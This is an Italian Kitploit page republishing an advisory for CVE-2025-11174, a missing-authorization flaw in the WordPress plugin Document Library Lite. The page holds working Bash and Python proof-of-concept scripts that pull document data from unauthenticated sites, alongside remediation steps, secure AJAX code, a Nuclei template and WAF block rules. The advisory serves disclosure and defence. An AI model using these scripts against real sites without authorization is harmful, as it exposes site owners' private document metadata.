Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Mancata autorizzazione all'esposizione di informazioni sensibili | CVE-2025-11174 | Kitploit
Strumenti/GitHubGitHub/snailsploit/cve-2025-11174
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Mancata autorizzazione all'esposizione di informazioni sensibili | CVE-2025-11174

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-11174: Divulgazione di Informazioni Non Autenticata nel Plugin WordPress Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Parole chiave: CVE-2025-11174, vulnerabilità di Document Library Lite, divulgazione di informazioni, sicurezza WordPress, exploit AJAX non autenticato, vulnerabilità plugin WordPress, CWE-862, sicurezza plugin documenti WordPress, bypass autorizzazione, WordPress CVE 2025

Indice

  • Panoramica
  • Dettagli della Vulnerabilità
  • Analisi Tecnica
  • Vettore d'Attacco
  • Prova di Concetto
  • Guida alla Risoluzione
  • Rilevamento
  • Metriche CVSS
  • Riferimenti
  • Crediti
  • Contatto per la Sicurezza
  • Panoramica

    Vulnerabilità di Divulgazione di Informazioni nel Plugin WordPress Document Library Lite (CVE-2025-11174) – Fallo di sicurezza che consente accesso non autenticato a dati documentali sensibili nel plugin libreria documenti WordPress.

    È stata scoperta una vulnerabilità critica di bypass dell'autorizzazione nel plugin WordPress Document Library Lite che permette a attaccanti non autenticati di accedere a informazioni sensibili sui documenti senza la corretta autenticazione.

    Scoperta da: Kai Aizen & Avraham Shemesh (SnailSploit)
    Pubblicata: 1 novembre 2025
    Punteggio CVSS: 5.3 (Medio)
    CWE: CWE-862 – Autorizzazione Mancante
    Plugin: Document Library Lite
    Fornitore: Barn2 Plugins
    Tipo di Attacco: Divulgazione di Informazioni Non Autenticata
    Privilegi Richiesti: Nessuno (Attacco Non Autenticato)

    Dettagli della Vulnerabilità

    Descrizione

    Il plugin Document Library Lite per WordPress contiene una vulnerabilità di autorizzazione impropria in tutte le versioni fino alla 1.1.6 inclusa. Il plugin espone un'azione AJAX non autenticata dll_load_posts che restituisce una tabella JSON di dati documentali senza eseguire controlli nonce o di capacità.

    Impatto

    Questa vulnerabilità consente ad attaccanti non autenticati di:

    • Accedere ai metadati dei documenti senza autorizzazione
    • Recuperare elenchi di documenti che dovrebbero essere riservati
    • Visualizzare informazioni sui documenti destinate solo a utenti autenticati
    • Enumerare i documenti memorizzati nella Libreria Documenti

    Nota: Il punteggio CVSS di 5.3 (gravità Media) riflette una divulgazione limitata di informazioni. Sebbene la vulnerabilità permetta accesso non autenticato ai dati dei documenti, l'impatto è valutato come Basso per la riservatezza, senza impatto su integrità o disponibilità.

    Versioni Affette

    • Vulnerabili: Tutte le versioni ≤ 1.1.6
    • Corrette: Versione 1.1.7 e successive

    Metriche CVSS v3.1

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    MetricaValore
    Vettore d'AttaccoRete (AV:N)
    Complessità d'AttaccoBassa (AC:L)
    Privilegi RichiestiNessuno (PR:N)
    Interazione UtenteNessuna (UI:N)
    ScopeInvariato (S:U)
    RiservatezzaBassa (C:L)
    IntegritàNessuna (I:N)
    DisponibilitàNessuna (A:N)

    Dettaglio CVSS v3.1:

    • Vettore d'Attacco (AV): Rete – La vulnerabilità può essere sfruttata remotamente attraverso una rete
    • Complessità d'Attacco (AC): Bassa – Non sono richieste condizioni speciali per lo sfruttamento
    • Privilegi Richiesti (PR): Nessuno – Non è richiesta autenticazione o privilegi
    • Interazione Utente (UI): Nessuna – L'exploit funziona senza alcuna interazione utente
    • Scope (S): Invariato – La vulnerabilità colpisce solo il componente vulnerabile
    • Impatto sulla Riservatezza (C): Basso – Divulgazione limitata di informazioni
    • Impatto sull'Integrità (I): Nessuno – Nessun impatto sull'integrità
    • Impatto sulla Disponibilità (A): Nessuno – Nessun impatto sulla disponibilità

    Dettagli Tecnici

    Causa Radice della Vulnerabilità

    L'azione AJAX dll_load_posts è registrata senza i dovuti controlli di autenticazione o autorizzazione:

    root@kitploit:~
    // Codice vulnerabile (semplificato)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    Il prefisso wp_ajax_nopriv_ indica che questa azione è accessibile a utenti non autenticati, e la funzione callback non implementa:

    • Verifica nonce
    • Controlli di capacità
    • Validazione dell'autenticazione utente

    Vettore d'Attacco

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    La vulnerabilità può essere sfruttata attraverso l'endpoint admin-ajax.php di WordPress senza autenticazione.

    Prova di Concetto

    ⚠️ Solo a Scopo Educativo e di Test Autorizzato

    Bash PoC

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    Python PoC

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    Guida alla Risoluzione

    Per Amministratori del Sito

    Azione Immediata Richiesta:

    1. Aggiornare Document Library Lite alla versione 1.1.7 o successiva immediatamente
    2. Controllare i log di accesso del sito per richieste POST sospette a admin-ajax.php con action=dll_load_posts
    3. Se non è possibile aggiornare immediatamente, considerare la disattivazione temporanea del plugin

    Istruzioni per l'Aggiornamento

    Tramite WordPress Admin:

    1. Navigare su Plugin > Plugin Installati nell'amministrazione WordPress
    2. Individuare "Document Library Lite"
    3. Cliccare Aggiorna Ora per passare alla versione 1.1.7 o successiva
    4. Verificare che l'aggiornamento sia riuscito

    Usando WP-CLI:

    root@kitploit:~
    wp plugin update document-library-lite
    

    Per Sviluppatori di Plugin

    Assicurarsi che tutti i gestori AJAX implementino controlli di sicurezza adeguati:

    root@kitploit:~
    // Esempio di corretta sicurezza AJAX
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // Verifica nonce
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Nonce non valido');
        }
        
        // Controlla le capacità
        if (!current_user_can('read')) {
            wp_send_json_error('Permessi insufficienti');
            wp_die();
        }
        
        // Il tuo codice sicuro qui
    }
    

    Rilevamento

    Controllo Plugin WordPress

    root@kitploit:~
    # Verifica se è installata una versione vulnerabile
    wp plugin list | grep -i "document-library-lite"
    

    Regole dello Scanner di Sicurezza

    Template Nuclei:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    Regole per Web Application Firewall

    Regola ModSecurity:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'Tentativo di Exploit CVE-2025-11174'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    Regola Nginx/OpenResty:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    Cronologia

    • 1 novembre 2025 – Vulnerabilità divulgata pubblicamente
    • 1 novembre 2025 – Record CVE pubblicato
    • Novembre 2025 – Patch rilasciata (versione 1.1.7)

    Riferimenti

    • CVE-2025-11174 - CVE.org
    • GitHub Advisory Database
    • Wordfence Intelligence
    • WordPress Plugin Directory

    Crediti

    Ricercatori:

    • Avraham Shemesh
    • Kai Aizen – SnailSploit

    Processo di Divulgazione: Divulgazione coordinata

    Disclaimer

    Queste informazioni sono fornite esclusivamente per scopi di ricerca sulla sicurezza e difensivi. Qualunque sfruttamento di questa vulnerabilità per scopi malintenzionati è illegale e non etico. Ottenere sempre la debita autorizzazione prima di testare sistemi che non si possiedono.

    Contatto

    Per domande o informazioni aggiuntive su questa vulnerabilità:

    • Email: [email protected]
    • Sito Web: snailsploit.com
    • Organizzazione: SnailSploit Security Research

    Ultimo aggiornamento: 2 novembre 2025


    📚 Documentazione e Autore

    Il writeup completo di questo progetto, la metodologia e la ricerca correlata si trovano su:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    Creata da Kai Aizen — ricercatore indipendente di sicurezza offensiva.

    snailsploit.com · Ricerca · Framework · GitHub · LinkedIn · ResearchGate · X/Twitter

    Stesso attacco. Substrato diverso.

    Scarica lo strumento